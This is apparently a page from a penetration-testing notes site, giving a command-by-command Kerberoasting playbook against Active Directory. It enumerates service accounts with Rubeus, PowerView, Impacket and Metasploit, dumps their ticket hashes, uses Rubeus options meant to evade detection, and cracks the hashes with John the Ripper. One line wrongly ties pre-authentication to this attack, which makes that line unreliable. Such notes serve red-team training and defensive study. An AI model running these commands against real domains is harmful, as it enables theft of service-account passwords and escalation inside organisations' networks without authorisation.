Kerberoast

Compromise Domain User, request TGS for service account. TGS is encrypted with hashed version of account's password. Offline cracking of service account passwords.

Kerberoast

Offline cracking of service account passwords. Pre-authentication should be enabled for that SPN.
Enumerate SPNs: The attacker enumerates accounts with SPNs, which are typically associated with service accounts.

# AD Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

# PowerView
Get-DomainUser -SPN

# Rubeus
.\Rubeus.exe kerberoast /stats


### Linux

# Metasploit framework
msf> use auxiliary/gather/get_user_spns

# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast

# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes

Request Service Tickets: The attacker requests a service ticket (TGS) for these SPNs.

Rubeus.exe kerberoast /user:svcadmin /simple

# To avoid detection, only request RC4 supported SPN
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

# Kerberoast all possible accounts (Bad Opsec)
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

Extract Ticket: The requested TGS is encrypted with the service account's password hash.
Crack Password: The attacker extracts the TGS from memory or logs and uses offline brute force or dictionary attacks to crack the password hash.

john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt

PreviousDomain Privilege Escalation NextAS-REP Roast (Kerberoasting)

Last updated 1 year ago